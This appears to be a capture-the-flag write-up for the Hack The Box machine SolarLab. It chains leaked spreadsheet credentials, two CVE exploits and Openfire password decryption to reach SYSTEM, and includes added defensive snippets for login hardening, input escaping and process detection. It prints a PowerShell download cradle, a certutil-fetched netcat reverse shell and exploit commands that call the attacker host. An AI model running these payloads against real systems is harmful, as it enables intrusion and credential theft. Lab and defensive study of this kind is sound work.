
HTB: SolarLab


SolarLab starts with SMB enumeration revealing an Excel file containing usernames and passwords. After subdomain discovery and credential spraying against ReportHub, we exploit CVE-2023-33733 (ReportLab RCE via HTML-to-PDF injection) for a foothold as blake. Lateral movement to the openfire user goes through CVE-2023-32315 (Openfire auth bypass). Root is reached by decrypting the Openfire admin password from the embedded database using the Blowfish key stored in the same database.
SMB → xlsx creds → ReportHub (BlakeB) → blake (CVE-2023-33733) → openfire (CVE-2023-32315) → Administrator (Openfire decrypt)

Reconnaissance

Nmap

The initial scan reveals HTTP, SMB and RPC ports on a Windows host. A full port scan additionally finds port 6791 running HTTP:

Nmap initial scan results
Nmap full port scan showing port 6791

Add solarlab.htb to /etc/hosts:

/etc/hosts with solarlab.htb

SMB Enumeration

Check SMB shares anonymously:

SMB share listing showing Documents share

The Documents share is accessible. It contains several interesting files:

SMB Documents share contents
smbclient — download all
┌──(SP1R4@kali)-[~/Documents/HTB/solarlab]
└─$ smbclient -N //solarlab.htb/Documents
smb: \> mget *
Downloaded files: details-file.xlsx, old_leave_request_form.docx, etc.

details-file.xlsx

The Excel file contains usernames, passwords, security questions, and email addresses. Most useful entries:

details-file.xlsx contents with credentials
Key credentials extracted:
KAlexander / al;ksdhfewoiuh
AlexanderK / dkjafblkjadsfgl
ClaudiaS / dadsfawe9dafkn / danenacia9234n
blake.byte / ThisCanB3typedeasily1@

Web Enumeration

Port 80 serves SolarLab IM — a coming-soon countdown page with no useful content:

SolarLab IM website on port 80

Subdomain brute-force

gobuster dns
┌──(SP1R4@kali)-[~/Documents/HTB/solarlab]
└─$ gobuster dns -d solarlab.htb -o gobuster_dns.log -w /opt/wordlists/seclist/Discovery/DNS/subdomains-top1million-10000.txt -t 100
Found: report.solarlab.htb
Gobuster DNS finding report.solarlab.htb

Port 6791 also redirects automatically to report.solarlab.htb. Add it to /etc/hosts:

Burp showing unknown host error before adding to hosts
/etc/hosts updated with report.solarlab.htb

ReportHub — Credential Attack

Port 6791 serves a Login to ReportHub page:

ReportHub login page

Testing the credentials from the xlsx shows that the error messages are specific: "User not found" versus "User authentication error" allows username enumeration. AlexanderK and ClaudiaS exist, but their passwords are wrong:

Login showing 'User not found' error
Login showing 'User authentication error' — user exists
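The two distinct error messages are what make the spray practical: the application confirms which usernames exist before a single password has to be right. The following snippet is an added example, not ReportHub's code or anything from the original post. It puts the leaky login check beside a hardened one that returns a single generic message, verifies a salted PBKDF2 hash rather than a stored plaintext (the plaintext passwords later found in users.db are the other half of this weakness), and performs the hash comparison on both failure paths so that an unknown username costs the same time as a wrong password. The table layout, account names and passwords are constructed for the example.

```python
import hashlib
import hmac
import os
import sqlite3

PBKDF2_ROUNDS = 100_000
GENERIC_ERROR = "Invalid username or password"


def hash_password(password: str, salt: bytes) -> bytes:
    """Salted PBKDF2-HMAC-SHA256; the database stores salt + hash, never the plaintext."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)


def build_demo_db() -> sqlite3.Connection:
    """Constructed in-memory users table; accounts and passwords are made up for this example."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE users (username TEXT PRIMARY KEY, salt BLOB NOT NULL, pw_hash BLOB NOT NULL)"
    )
    for username, password in [("alexanderk", "demo-pass-1"), ("blakeb", "demo-pass-2")]:
        salt = os.urandom(16)
        con.execute("INSERT INTO users VALUES (?, ?, ?)", (username, salt, hash_password(password, salt)))
    con.commit()
    return con


def _lookup(con: sqlite3.Connection, username: str):
    return con.execute("SELECT salt, pw_hash FROM users WHERE username = ?", (username,)).fetchone()


def login_leaky(con: sqlite3.Connection, username: str, password: str):
    """Leaky form: two different messages reveal whether the username exists."""
    row = _lookup(con, username)
    if row is None:
        return False, "User not found"
    if hash_password(password, row[0]) != row[1]:
        return False, "User authentication error"
    return True, "ok"


# Dummy credential so the unknown-user path does the same PBKDF2 work as the known-user path
# (keeps the response time from leaking what the message no longer does).
_DUMMY_SALT = os.urandom(16)
_DUMMY_HASH = hash_password("dummy", _DUMMY_SALT)


def login_uniform(con: sqlite3.Connection, username: str, password: str):
    """Hardened form: one generic message, constant-time compare, equal cost on both failure paths."""
    row = _lookup(con, username)
    salt, expected = row if row is not None else (_DUMMY_SALT, _DUMMY_HASH)
    hash_matches = hmac.compare_digest(hash_password(password, salt), expected)
    if row is None or not hash_matches:
        return False, GENERIC_ERROR
    return True, "ok"


if __name__ == "__main__":
    db = build_demo_db()
    for check in (login_leaky, login_uniform):
        print(check.__name__, check(db, "nosuchuser", "x"), check(db, "blakeb", "wrong"))
```

Run stand-alone, the script prints the two responses each variant gives for an unknown user and for a known user with a wrong password; only the leaky variant tells them apart. Rate limiting per source and per account is the usual complement to this change, since a uniform message alone does not stop a slow spray.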

Burp Intruder — credential spray

Use Burp Intruder with a cluster bomb attack to mix and match usernames and passwords:

Burp Intruder cluster bomb setup
Burp payload sets with usernames and passwords
Burp Intruder results — no valid combinations found

No valid credentials were found in the first spray. Looking more carefully at the username pattern (AlexanderK, ClaudiaS) suggests first name + last initial. The xlsx shows blake.byte, so the username should be BlakeB:

xlsx showing blake.byte with password ThisCanB3typedeasily1@
Burp — BlakeB hit
# Request length 660 (different from the others at 2419) = valid login
BlakeB : ThisCanB3typedeasily1@
Burp results showing BlakeB with length 660 — valid hit
Valid credentials: BlakeB:ThisCanB3typedeasily1@

Foothold — CVE-2023-33733 (ReportLab RCE)

After logging in, ReportHub exposes four features — Leave Request, Training Request, Home Office Request, and Travel Approval. All generate PDFs:

ReportHub dashboard with four request options
Leave Request form with Generate PDF button
Generated PDF output from leave request
Training Request form

The PDF generator uses ReportLab, which is vulnerable to CVE-2023-33733: HTML injection in the justification field leads to RCE in the PDF rendering engine:

Google search showing CVE-2023-33733 ReportLab RCE
Burp request with CVE-2023-33733 payload injected into form field
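The underlying problem is that ReportLab's Paragraph treats its input string as markup, so whatever a user types into the justification field is parsed as tags instead of being shown as text. The snippet below is an added example and not ReportHub's code: it shows the boundary fix, escaping the user's text before it is placed into the markup template, plus a small check that flags tag-like input in a field that should only ever hold plain text, which is a useful log signal for the application. The template string is an assumption; the real one is not on the page. Upgrading ReportLab to a release that fixes the CVE is still required; escaping at the boundary is defence in depth that also closes the door for any other markup feature the library exposes.

```python
import re
from xml.sax.saxutils import escape

# Assumed server-side template; ReportHub's actual markup is not on the page.
JUSTIFICATION_TEMPLATE = "<para><b>Justification:</b> {body}</para>"

# Tag-like sequences in a free-text field: '<' directly followed by an optional '/' and a letter.
# A bare "a < b" comparison does not match, "<font ...>" and "</font>" do.
TAG_RE = re.compile(r"</?[A-Za-z][^>]*>")


def render_justification(user_text: str) -> str:
    """Return Paragraph markup in which user_text is inert text and can never become a tag."""
    body = escape(user_text, {'"': "&quot;", "'": "&#39;"})
    return JUSTIFICATION_TEMPLATE.format(body=body)


def markup_in_user_input(user_text: str) -> list:
    """Tags found in a field that should be plain text; worth logging as an attempted injection."""
    return TAG_RE.findall(user_text)


if __name__ == "__main__":
    sample = 'I need leave <font color="red">now</font>'  # constructed input
    print(markup_in_user_input(sample))
    print(render_justification(sample))
```

The escaped output still renders the user's text verbatim in the PDF, including the literal angle brackets, so nothing the user can type reaches ReportLab's markup parser. The detection helper is deliberately separate from the fix: escape unconditionally, and use the tag check only to decide whether to log or alert.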

Trigger a reverse shell via a PowerShell download cradle embedded in the exploit:

CVE-2023-33733 payload
# Injected into the justification field (HTML rendered by ReportLab)
powershell.exe -c iex (iwr -UseBasicParsing http://10.10.14.63/Invoke-PowerShellTcpEx.ps1)

┌──(SP1R4@kali)-[~]
└─$ sudo nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.10.14.63] from (UNKNOWN) [10.10.11.16] 53730
Windows PowerShell running as user blake on SOLARLAB
PS C:\Users\blake\Documents\app>
Reverse shell received as blake on SOLARLAB
whoami and whoami /priv showing blake's privileges
ipconfig and user.txt flag
🚩 User flag captured as solarlab\blake.

Lateral Movement — blake → openfire

Credential discovery in app database

Inside C:\Users\blake\Documents\app\instance, there's a users.db SQLite file containing all application credentials:

users.db contents showing alexanderk, claudias, blakeb credentials
Credential summary: blakeb, alexanderk, claudias
credentials from users.db
blakeb : ThisCanB3typedeasily1@
alexanderk : HotP!fireguard
claudias : 007poiuytrewq

Openfire — port forwarding

Checking active connections and the C:\Users directory reveals an openfire user and Openfire listening on 127.0.0.1:9090:

C:\Users showing Administrator, blake, openfire, Public
Netstat showing Openfire on 127.0.0.1:9090

WinPEAS confirms the credentials in utils.py and reveals nothing additional:

WinPEAS output showing hardcoded credentials in utils.py
C:\Program Files showing Openfire and RUXIM directories
Access denied when trying to cd into Openfire directory

The Openfire directory is inaccessible as blake — we need the openfire user first. Forward port 9090 using chisel:

chisel — port forward 9090
# Kali — start chisel server
┌──(SP1R4@kali)-[~]
└─$ chisel server --socks5 --reverse -p 1234

# Target — connect back and tunnel port 9090
PS C:\Users\blake\Documents\app> .\chiselx86_64.exe client 10.10.14.63:1234 R:9090:127.0.0.1:9090
Chisel server running on Kali with session established
Chisel client on target connecting back
Openfire Administration Console login page on 127.0.0.1:9090

CVE-2023-32315 — Openfire Auth Bypass

Google search for Openfire RCE CVE-2023-32315
CVE-2023-32315 exploit
┌──(SP1R4@kali)-[~/Documents/HTB/solarlab]
└─$ git clone https://github.com/miko550/CVE-2023-32315.git && cd CVE-2023-32315
┌──(SP1R4@kali)-[~/Documents/HTB/solarlab/CVE-2023-32315]
└─$ python3 CVE-2023-32315.py -t http://127.0.0.1:9090
User added successfully:
url: http://127.0.0.1:9090
username: m87vm2
password: ky4kb6
CVE-2023-32315 exploit output — new user added

Login with the newly created user, then upload the openfire-management-tool-plugin.jar plugin:

Openfire admin dashboard after successful login
Plugin upload page with openfire-management-tool-plugin.jar
Management tool login interface
Management tool command execution — whoami showing solarlab\openfire

Execute a reverse shell via the management tool to get a proper shell as openfire:

openfire shell via management tool
# Upload nc.exe and execute via management tool
certutil -urlcache -f http://10.10.14.63/nc.exe nc.exe
nc.exe 10.10.14.64 4444 -e cmd.exe

┌──(SP1R4@kali)-[~]
└─$ sudo nc -lvnp 4444
C:\Program Files\Openfire\bin> whoami
solarlab\openfire
nc shell received as solarlab\openfire
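Both shells on this box come from the same kind of event: a server process (the Python web app under blake, the Java Openfire service here) spawning a command interpreter or a built-in downloader, which is something an endpoint sensor sees even when the web request itself looks like an ordinary form post. The following snippet is an added example, not code from the original post or from any product: it runs a few simple rules over process-creation events, covering the PowerShell download cradle used for the foothold, certutil -urlcache as a downloader, and nc.exe with -e as used for the openfire shell. The events, field names, hosts, paths and IP addresses are constructed for the example in a Sysmon-like shape; the parent-process set is an assumption about which binaries serve web or application traffic.

```python
import re

# Constructed process-creation events (Sysmon-like field names chosen for this example).
# Users, paths and addresses are made up; they are not the box's values.
SAMPLE_EVENTS = [
    {"User": "SOLARLAB\\blake", "ParentImage": r"C:\Python311\python.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -c iex (iwr -UseBasicParsing http://203.0.113.10/stage.ps1)"},
    {"User": "SOLARLAB\\openfire", "ParentImage": r"C:\Program Files\Openfire\jre\bin\java.exe",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -urlcache -f http://203.0.113.10/tool.exe tool.exe"},
    {"User": "SOLARLAB\\openfire", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Program Files\Openfire\bin\nc.exe",
     "CommandLine": "nc.exe 203.0.113.10 4444 -e cmd.exe"},
    {"User": "SOLARLAB\\blake", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
]

# Assumed set of binaries that serve web or application traffic on this host.
SERVER_PARENTS = {"python.exe", "pythonw.exe", "java.exe", "w3wp.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Cmdlets and methods that fetch-and-run code in one line; word boundaries avoid matching
# unrelated substrings such as "-ExecutionPolicy".
CRADLE_RE = re.compile(r"\b(iex|invoke-expression|iwr|invoke-webrequest|downloadstring|downloadfile)\b")
NC_EXEC_RE = re.compile(r"\s-e\s+(cmd|powershell)(\.exe)?\b")


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(event: dict) -> list:
    """Return the names of the rules an event matches; an empty list means nothing fired."""
    image, parent = basename(event["Image"]), basename(event["ParentImage"])
    cmd = event["CommandLine"].lower()
    hits = []
    if image in SHELLS and parent in SERVER_PARENTS:
        hits.append("shell spawned by server process")
    if image in {"powershell.exe", "pwsh.exe"} and CRADLE_RE.search(cmd):
        hits.append("powershell download cradle")
    if image == "certutil.exe" and "-urlcache" in cmd:
        hits.append("certutil used as downloader")
    if image == "nc.exe" or NC_EXEC_RE.search(cmd):
        hits.append("netcat reverse shell")
    return hits


def triage(events: list) -> list:
    """Events that matched at least one rule, with the user, command line and rule names."""
    flagged = []
    for event in events:
        rules = classify(event)
        if rules:
            flagged.append({"user": event["User"], "cmd": event["CommandLine"], "rules": rules})
    return flagged


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["user"], hit["rules"], "::", hit["cmd"])
```

The first rule is the one that matters most on a host like this: a web or application service should essentially never spawn PowerShell or cmd.exe, so that parent/child pair is a high-confidence signal regardless of what the command line contains. The command-line rules catch the same activity when the parent is something less specific, at the cost of needing tuning against legitimate administration scripts.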

Privilege Escalation — openfire → Administrator

Openfire embedded-db

As openfire, we can now access the Openfire directory. The embedded-db directory contains the database files:

C:\Program Files\Openfire\embedded-db directory listing
openfire.script file showing INSERT statements

The openfire.script contains the OFUSER table with the admin's encrypted password:

INSERT INTO OFUSER showing admin encrypted password hash
OFUSER table structure and data
admin encrypted password
INSERT INTO OFUSER VALUES('admin','gjMoswpK+HakPdvLIvp6eLKlYh0=','9MwNQcJ9bF4Ye... becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442','Administrator','admin@solarlab.htb',...)

Finding the blowfish key

The OFPROPERTY table in the same script contains the passwordKey used for blowfish encryption:

INSERT INTO OFPROPERTY showing passwordKey=hGXiFzsKaAeYLjn
passwordKey from OFPROPERTY
INSERT INTO OFPROPERTY VALUES('passwordKey','hGXiFzsKaAeYLjn',0,NULL)

Decrypting the admin password

Use the Java-based c0rdis/openfire_decrypt tool (the PHP version doesn't work):

decrypting the admin password
┌──(SP1R4@kali)-[~/Documents/HTB/solarlab/openfire_decrypt]
└─$ javac OpenFireDecryptPass.java
┌──(SP1R4@kali)-[~/Documents/HTB/solarlab/openfire_decrypt]
└─$ java OpenFireDecryptPass becb0c67cfec...59d442 hGXiFzsKaAeYLjn
ThisPasswordShouldDo!@ (hex: 005400680069...)
admin : ThisPasswordShouldDo!@

Code execution as SYSTEM

Verify the administrator credentials against SMB and execute via impacket-smbexec:

impacket-smbexec — SYSTEM
┌──(SP1R4@kali)-[~/Documents/HTB/solarlab/openfire_decrypt]
└─$ impacket-smbexec administrator:'ThisPasswordShouldDo!@'@solarlab.htb
Impacket v0.11.0 - Copyright 2023 Fortra

[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32> whoami
nt authority\system
🚩 Root flag captured. Machine pwned.

Summary

Stage              | Technique                                                     | Tool
Recon              | SMB anonymous read → xlsx with creds                          | smbclient
Subdomain          | DNS brute-force → report.solarlab.htb                         | gobuster
Foothold           | CVE-2023-33733 ReportLab HTML-to-PDF RCE                      | Burp, nc
Lateral (openfire) | CVE-2023-32315 Openfire auth bypass → mgmt plugin RCE         | python3, chisel
Root               | Blowfish decrypt of Openfire admin password from embedded-db  | java, impacket

Key commands

quick reference
# SMB enumeration
smbclient -N //solarlab.htb/Documents

# Subdomain discovery
gobuster dns -d solarlab.htb -w subdomains-top1million-10000.txt

# Port forwarding via chisel
chisel server --socks5 --reverse -p 1234                  # Kali
chiselx86_64.exe client <IP>:1234 R:9090:127.0.0.1:9090   # Target

# Openfire auth bypass
python3 CVE-2023-32315.py -t http://127.0.0.1:9090

# Openfire password decrypt
javac OpenFireDecryptPass.java
java OpenFireDecryptPass <enc_password> <blowfish_key>

# SMBexec as Administrator
impacket-smbexec administrator:'ThisPasswordShouldDo!@'@solarlab.htb